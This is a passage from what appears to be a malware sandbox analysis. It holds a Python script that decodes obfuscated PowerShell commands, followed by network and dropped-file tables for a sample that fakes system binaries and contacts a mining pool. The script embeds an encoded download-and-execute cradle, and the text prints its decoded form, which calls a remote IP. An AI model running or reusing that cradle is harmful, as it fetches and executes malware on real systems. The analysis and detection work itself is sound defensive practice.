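ENC_CRADLE_R = "JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA=="

ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'((?:[^']|'')*)'")  # $name='literal' ('' escapes a quote)
JOIN_RE = re.compile(r"\(\s*((?:\$\w+\s*,\s*)+\$\w+)\s+-Join\s+''\s*\)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()|]+")


def decode_enc(arg):
    """-EncodedCommand is base64 over UTF-16LE, not UTF-8."""
    return base64.b64decode(arg).decode("utf-16-le").rstrip("\x00")


def reassemble(script):
    """Resolve fragments held in variables and concatenated with ($a,$b,$c -Join '')."""
    frags = {n: v.replace("''", "'") for n, v in ASSIGN_RE.findall(script)}
    out = script
    for m in JOIN_RE.finditer(script):
        names = [n.strip().lstrip("$") for n in m.group(1).split(",")]
        out = out.replace(m.group(0), "".join(frags.get(n, "") for n in names))
    return out.replace("`", "")  # I`E`X -> IEX


def triage(arg):
    decoded = decode_enc(arg)
    rebuilt = reassemble(decoded)
    flags = []
    if re.search(r"Add-MpPreference", rebuilt, re.I):
        flags.append("defender-exclusion")
    if re.search(r"Download(String|File|Data)|Invoke-WebRequest", rebuilt, re.I):
        flags.append("download-cradle")
    if re.search(r"\bIEX\b|Invoke-Expression", rebuilt, re.I):
        flags.append("invoke-expression")
    return {"decoded": decoded, "rebuilt": rebuilt,
            "urls": sorted(set(URL_RE.findall(rebuilt))), "flags": flags}


def extract_urls(arg):
    return triage(arg)["urls"]


if __name__ == "__main__":
    for label, enc in (("defender", ENC_DEFENDER), ("o.png", ENC_CRADLE_O),
                       ("file.png", ENC_CRADLE_FILE), ("r.png", ENC_CRADLE_R)):
        r = triage(enc)
        print(label, r["flags"], r["urls"])
        print("  ", r["rebuilt"])
```

Running it shows the first command as a Defender exclusion for C:\ and the other three as `IEX (New-Object Net.WebClient).DownloadString('http://62.204.41.23/<name>.png')|IEX`, which matches the three connections to 62.204.41.23:80 in the network table that follows. Decoding and joining before matching is the important step: a rule that looks for `DownloadString` or `IEX` in the raw command line sees neither.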

Network

Country Destination Domain Proto
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
US 8.8.8.8:53 254.23.238.8.in-addr.arpa udp
US 93.184.220.29:80 tcp
US 8.8.8.8:53 23.41.204.62.in-addr.arpa udp
US 8.8.8.8:53 33.146.190.20.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 52.242.101.226:443 tcp
US 34.117.59.81:80 ipinfo.io tcp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 20.189.173.5:443 tcp
NL 8.238.21.126:80 tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
NL 173.223.113.164:443 tcp
NL 173.223.113.131:80 tcp
US 131.253.33.203:80 tcp
US 8.8.8.8:53 121.208.253.8.in-addr.arpa udp
US 8.8.8.8:53 maper.info udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 148.251.234.93:443 maper.info tcp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 52.242.101.226:443 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
US 8.8.8.8:53 63.13.109.52.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 52.242.101.226:443 tcp
US 52.242.101.226:443 tcp
NL 8.238.21.126:80 tcp
US 52.242.101.226:443 tcp
US 52.242.101.226:443 tcp

Files

memory/1740-133-0x00000000009C0000-0x00000000009D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xr2swawa.kb4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4780-144-0x000002A3690C0000-0x000002A3690E2000-memory.dmp

memory/2832-172-0x000002423F420000-0x000002423F430000-memory.dmp

memory/4780-173-0x000002A369810000-0x000002A369820000-memory.dmp

memory/4732-174-0x000001EE9DFD0000-0x000001EE9DFE0000-memory.dmp

memory/2832-175-0x000002423F420000-0x000002423F430000-memory.dmp

memory/3604-176-0x000001E6F5690000-0x000001E6F56A0000-memory.dmp

memory/3604-177-0x000001E6F5690000-0x000001E6F56A0000-memory.dmp

memory/4732-179-0x000001EE9DFD0000-0x000001EE9DFE0000-memory.dmp

memory/4780-178-0x000002A369810000-0x000002A369820000-memory.dmp

memory/3604-180-0x000001E6F5690000-0x000001E6F56A0000-memory.dmp

memory/2832-181-0x000002423F420000-0x000002423F430000-memory.dmp

memory/2832-184-0x000002423F420000-0x000002423F430000-memory.dmp

memory/4780-185-0x000002A369810000-0x000002A369820000-memory.dmp

memory/4732-186-0x000001EE9DFD0000-0x000001EE9DFE0000-memory.dmp

memory/2832-187-0x000002423F420000-0x000002423F430000-memory.dmp

memory/3604-188-0x000001E6F5690000-0x000001E6F56A0000-memory.dmp

memory/3604-189-0x000001E6F5690000-0x000001E6F56A0000-memory.dmp

memory/4780-191-0x000002A369810000-0x000002A369820000-memory.dmp

memory/2832-190-0x000002423F420000-0x000002423F430000-memory.dmp

memory/4732-192-0x000001EE9DFD0000-0x000001EE9DFE0000-memory.dmp

memory/3604-193-0x000001E6F5690000-0x000001E6F56A0000-memory.dmp

memory/1528-194-0x0000000000400000-0x000000000040C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0c9e4a5091153aad3afaf5372fbb07a0
SHA1 dbe1fc5ac93d241d51311f638d8a386f01bf25aa
SHA256 f88bdcf6352355427dc31af5f99817e7ead0349ba5b17e0dc5331ad424e7b6e4
SHA512 3e0811a82f7eb57c32e3eaeee734951c93ea3616476fa3e52ebb135de41ead7855db5539f991f6826568fc4d658fa7a266fdfe4e3840bdb9813005d6e7ee746e

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/1528-198-0x00000000050B0000-0x0000000005116000-memory.dmp

memory/1528-199-0x00000000051C0000-0x000000000525C000-memory.dmp

memory/1528-200-0x0000000005260000-0x00000000052C6000-memory.dmp

memory/1528-204-0x0000000005630000-0x0000000005640000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/4200-213-0x000001DEF24A0000-0x000001DEF24B0000-memory.dmp

memory/4200-217-0x000001DEF24A0000-0x000001DEF24B0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0c9e4a5091153aad3afaf5372fbb07a0
SHA1 dbe1fc5ac93d241d51311f638d8a386f01bf25aa
SHA256 f88bdcf6352355427dc31af5f99817e7ead0349ba5b17e0dc5331ad424e7b6e4
SHA512 3e0811a82f7eb57c32e3eaeee734951c93ea3616476fa3e52ebb135de41ead7855db5539f991f6826568fc4d658fa7a266fdfe4e3840bdb9813005d6e7ee746e

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 888bfc5a63177bdc5aaa1429eca8e632
SHA1 3eca9ed178f35a94524a17356a60702d8d5d2e69
SHA256 fc233bc51158c9250a005cab1d7e3b200722a675e392e799b11a5eef6503339c
SHA512 c95f454d559038393d55a7afc889e675ede6a8f5cdecf238f5b09ce8e0a88adc4c7e1d711c3c23469e086fe4e7beb6655b1810a5b085b137495c8db4890749ac

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 888bfc5a63177bdc5aaa1429eca8e632
SHA1 3eca9ed178f35a94524a17356a60702d8d5d2e69
SHA256 fc233bc51158c9250a005cab1d7e3b200722a675e392e799b11a5eef6503339c
SHA512 c95f454d559038393d55a7afc889e675ede6a8f5cdecf238f5b09ce8e0a88adc4c7e1d711c3c23469e086fe4e7beb6655b1810a5b085b137495c8db4890749ac

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 888bfc5a63177bdc5aaa1429eca8e632
SHA1 3eca9ed178f35a94524a17356a60702d8d5d2e69
SHA256 fc233bc51158c9250a005cab1d7e3b200722a675e392e799b11a5eef6503339c
SHA512 c95f454d559038393d55a7afc889e675ede6a8f5cdecf238f5b09ce8e0a88adc4c7e1d711c3c23469e086fe4e7beb6655b1810a5b085b137495c8db4890749ac

memory/4200-233-0x000001DEF24A0000-0x000001DEF24B0000-memory.dmp

memory/3868-234-0x0000000000400000-0x000000000058B000-memory.dmp

memory/4200-235-0x000001DEF24A0000-0x000001DEF24B0000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/4956-239-0x00007FF6BFB10000-0x00007FF6C04DA000-memory.dmp

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/4912-251-0x00000000008B0000-0x0000000000CD0000-memory.dmp

memory/4912-252-0x00000000008B0000-0x0000000000CD0000-memory.dmp

memory/4912-253-0x00000000008B0000-0x0000000000CD0000-memory.dmp

memory/4912-255-0x0000000006FF0000-0x0000000007594000-memory.dmp

memory/4912-257-0x0000000006B40000-0x0000000006BD2000-memory.dmp

memory/4072-256-0x000001EF9AC50000-0x000001EF9AC60000-memory.dmp

memory/4072-254-0x000001EF9AC50000-0x000001EF9AC60000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2f28840c31cfc5322025fe3d865ba93e
SHA1 a7e5821a77330ad789add83f5e8bbb60513b9a1c
SHA256 fbe81573de344e57534ac098c44252bbd81bd76009120f16b4c11cd48a4b551e
SHA512 6c819271b07a320b85c33475504b1b7b5e1fb57c78facd1bdd29a623a9dd3d11d6e2f7cd78e8b81da4b28a7e61b0caf6694894033d05c064f8e70dd06350ae4b

memory/1528-269-0x0000000005630000-0x0000000005640000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2ac3c9ba89b8c2ef19c601ecebb82157
SHA1 a239a4b11438c00e5ff89ebd4a804ede6a01935b
SHA256 3c2714ce07f8c04b3f8222dfe50d8ae08f548b0e6e79fe33d08bf6f4c2e5143e
SHA512 b1221d29e747b37071761b2509e9109b522cce6411f73f27c9428ac332d26b9f413ae6b8c0aeac1afb7fab2d0b3b1c4af189da12fe506287596df2ef8f083432

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/812-277-0x0000023985970000-0x0000023985990000-memory.dmp

memory/2308-276-0x00007FF6A2590000-0x00007FF6A2F5A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8b5d3a2c2b26ac36b88cf03dd0a32fa9
SHA1 a9122eb088176912311fc0f8eb0b8f020693d259
SHA256 8a11a416df1c3ef93ee65773a43d84cdec960e9d551fcb0a4351fc15f1d0ff52
SHA512 47e0f4eddc7e7323988597ac5fcf7c7ea15a9999667e07d6cc422fb072a5d2e0c5501a11db8b4f5e8a0f380a85ef0a60f9a201ed30f80b104b825bfe8d60a7c6

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/4912-294-0x00000000008B0000-0x0000000000CD0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\lsass.exe.log

MD5 24cfd42a8de70b38ed70e1f8cf4eda1c
SHA1 e447168fd38da9175084b36a06c3e9bbde99064c
SHA256 93b740416114e346878801c73e8a8670ff1390d3fa009424b88fafe614a3c5cd
SHA512 5c2daf5328ba99d750e9d0362e84f3a79b7fc8395aa8aa2bc1a01b266583fe1f8352bf0619f985aa72223412d14afa054537739b4941610a1d0f96e7fee2a875

memory/2940-296-0x0000000000B20000-0x0000000000F40000-memory.dmp

memory/2940-297-0x0000000000B20000-0x0000000000F40000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp4585.tmp.bat

MD5 5576954a22523de856c2b60faae0416c
SHA1 03ef8615babe305844623e6a7b18057c8c1e877a
SHA256 834efbd0b2a94e71425f18204c18c3d3966098e72ce238881a562a668be22da3
SHA512 0d1ca96b8350c59c404fd89b3bfd4508ba1e0a9d7e4e175a6bf97962ee179c7c8e2de97eb51256a420be84a198d4b0c4f6f4b25b49f7d025c5d0584bb9ebdfd4

memory/2940-299-0x0000000000B20000-0x0000000000F40000-memory.dmp

memory/812-300-0x0000023987370000-0x00000239873B0000-memory.dmp

memory/3868-301-0x0000000000400000-0x000000000058B000-memory.dmp

memory/2940-306-0x0000000006CD0000-0x0000000006CDA000-memory.dmp

C:\Users\Admin\Desktop\PublishRead.txt

MD5 17700405062181a5b94a7430f5cf5954
SHA1 be180e7596885a6358675e7a63408a40096f8405
SHA256 e6318a937b2514ad6c454f3f97a6ac3653765ef0b2b98419256a2e95d656c86f
SHA512 358180b68ec59e895d2691327533e153334cb4b626d024836d9d6a1e092cec2adec55bb524cb76716d9a8884b92b510351c7600af7b1468fee29fd9696d46412

memory/220-330-0x00007FF61F900000-0x00007FF61F929000-memory.dmp

memory/812-331-0x00007FF641860000-0x00007FF64204F000-memory.dmp

memory/2940-332-0x0000000000B20000-0x0000000000F40000-memory.dmp

memory/220-334-0x00007FF61F900000-0x00007FF61F929000-memory.dmp

memory/812-335-0x00007FF641860000-0x00007FF64204F000-memory.dmp

memory/2940-336-0x0000000000B20000-0x0000000000F40000-memory.dmp

memory/812-339-0x00007FF641860000-0x00007FF64204F000-memory.dmp

memory/2940-340-0x0000000000B20000-0x0000000000F40000-memory.dmp

memory/812-342-0x00000239873E0000-0x0000023987400000-memory.dmp

memory/812-344-0x00007FF641860000-0x00007FF64204F000-memory.dmp

memory/2940-345-0x0000000000B20000-0x0000000000F40000-memory.dmp

memory/812-347-0x00000239873E0000-0x0000023987400000-memory.dmp

memory/812-349-0x00007FF641860000-0x00007FF64204F000-memory.dmp

memory/2940-350-0x0000000000B20000-0x0000000000F40000-memory.dmp

memory/812-353-0x00007FF641860000-0x00007FF64204F000-memory.dmp

memory/2940-354-0x0000000000B20000-0x0000000000F40000-memory.dmp

memory/812-357-0x00007FF641860000-0x00007FF64204F000-memory.dmp

memory/2940-358-0x0000000000B20000-0x0000000000F40000-memory.dmp

memory/812-361-0x00007FF641860000-0x00007FF64204F000-memory.dmp

memory/2940-362-0x0000000000B20000-0x0000000000F40000-memory.dmp

memory/812-365-0x00007FF641860000-0x00007FF64204F000-memory.dmp

memory/2940-366-0x0000000000B20000-0x0000000000F40000-memory.dmp

memory/812-369-0x00007FF641860000-0x00007FF64204F000-memory.dmp

memory/2940-370-0x0000000000B20000-0x0000000000F40000-memory.dmp